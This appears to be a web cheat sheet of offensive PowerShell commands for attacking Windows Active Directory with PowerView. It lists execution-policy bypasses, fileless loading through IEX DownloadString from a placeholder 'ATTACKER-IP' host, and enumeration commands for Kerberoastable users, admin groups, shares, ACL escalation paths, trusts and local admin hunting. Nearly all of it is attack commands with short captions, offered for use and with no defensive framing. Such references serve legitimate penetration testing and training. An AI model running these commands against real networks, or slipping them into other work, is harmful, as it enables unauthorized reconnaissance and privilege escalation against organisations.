Skip to main content

๐Ÿ›ก๏ธ PowerShell Execution Policy Bypass

Allows running unsigned PowerShell scripts in the current process.
powershell -ep bypass
Start a new PowerShell without profile restrictions.
powershell.exe -ExecutionPolicy Bypass -NoProfile
Execute PowerView in memory (fileless execution).
powershell -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/PowerView.ps1')"

๐Ÿ“ฅ Loading PowerView

Start temporary HTTP server on attacker machine.
python3 -m http.server 80
Load PowerView directly into memory.
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/PowerView.ps1')
Download the script locally.
Invoke-WebRequest http://ATTACKER-IP/PowerView.ps1 -OutFile PowerView.ps1
Import the module.
Import-Module .\PowerView.ps1
Check which command naming exists.
Get-Command *Domain*
Get-Command *Net*

๐Ÿ” Domain Enumeration

Get general domain information.
Get-Domain
Retrieve the domain SID.
Get-DomainSID
List domain policies.
Get-DomainPolicy
Show password & lockout policy.
(Get-DomainPolicy)."SystemAccess"
Show Kerberos configuration.
(Get-DomainPolicy)."KerberosPolicy"
List domain controllers.
Get-DomainController
Legacy (old PowerView) Get general domain information.
Get-NetDomain
Retrieve the domain SID.
Get-NetDomainSID
List domain policies.
Get-NetDomainPolicy
List domain controllers.
Get-NetDomainController

๐Ÿ‘ค User Enumeration

List domain users.
Get-DomainUser
Detailed information about a user.
Get-DomainUser -Identity <user> -Properties *
Find Kerberoastable accounts (SPN users).
Get-DomainUser -SPN
Identify privileged/protected accounts.
Get-DomainUser -AdminCount
Accounts trusted for delegation.
Get-DomainUser -TrustedToAuth
Check logged-on users on a machine.
Get-NetLoggedon -ComputerName <computer>
Legacy (old PowerView) List domain users.
Get-NetUser
Get specific user information.
Get-NetUser -UserName <user>
Find Kerberoastable accounts.
Get-NetUser -SPN
Find privileged accounts.
Get-NetUser -AdminCount

๐Ÿ’ป Computer Enumeration

List domain computers.
Get-DomainComputer
Find servers only.
Get-DomainComputer -OperatingSystem "*Server*"
Last logged-on user of a machine.
Get-LastLoggedOn -ComputerName <computer>
Legacy (old PowerView) List domain computers.
Get-NetComputer
Find servers only.
Get-NetComputer -OperatingSystem "*Server*"

๐Ÿ‘ฅ Group Enumeration

List domain groups.
Get-DomainGroup
Find administrative groups.
Get-DomainGroup *admin*
List group members.
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Find groups a user belongs to.
Get-DomainGroup -UserName <user>
Legacy (old PowerView) List domain groups.
Get-NetGroup
List members of a group.
Get-NetGroupMember -GroupName "Domain Admins"

๐Ÿ“‚ Share Enumeration

Find domain shares.
Find-DomainShare
Find accessible shares.
Find-DomainShare -CheckShareAccess
Legacy (old PowerView) Find network shares.
Invoke-ShareFinder
Locate file servers in domain.
Get-NetFileServer

๐Ÿงพ GPO Enumeration

List Group Policy Objects.
Get-DomainGPO
GPO applied to a computer.
Get-DomainGPO -ComputerName <computer>
Machines where GPO grants admin rights.
Find-GPOComputerAdmin -ComputerName <computer>
Where a user has admin rights via GPO.
Find-GPOLocation -Identity <user>
Legacy (old PowerView) List Group Policy Objects.
Get-NetGPO

๐Ÿข OU Enumeration

List organizational units.
Get-DomainOU
Legacy (old PowerView) List organizational units.
Get-NetOU

๐Ÿ” ACL Enumeration

View permissions on AD objects.
Get-DomainObjectAcl -Identity <object> -ResolveGUIDs
Find privilege escalation paths.
Invoke-ACLScanner -ResolveGUIDs
Legacy (old PowerView) View permissions on AD objects.
Get-ObjectAcl -SamAccountName <object>

๐Ÿ”— Trust Enumeration

Enumerate domain trusts.
Get-DomainTrust
Map trust relationships.
Get-DomainTrustMapping
Legacy (old PowerView) Enumerate domain trusts.
Get-NetDomainTrust

๐ŸŒฒ Forest Enumeration

Get forest information.
Get-Forest
List forest domains.
Get-ForestDomain
List global catalog servers.
Get-ForestGlobalCatalog
Legacy (old PowerView) Get forest information.
Get-NetForest
List forest domains.
Get-NetForestDomain

๐ŸŽฏ Privilege Escalation / Hunting

Find machines where current user is local admin.
Find-LocalAdminAccess
Find privileged sessions.
Invoke-UserHunter
Enumerate local administrators across domain.
Invoke-EnumerateLocalAdmin
Find unconstrained delegation systems.
Get-DomainComputer -Unconstrained
Legacy (old PowerView) Find unconstrained delegation systems.
Get-NetComputer -Unconstrained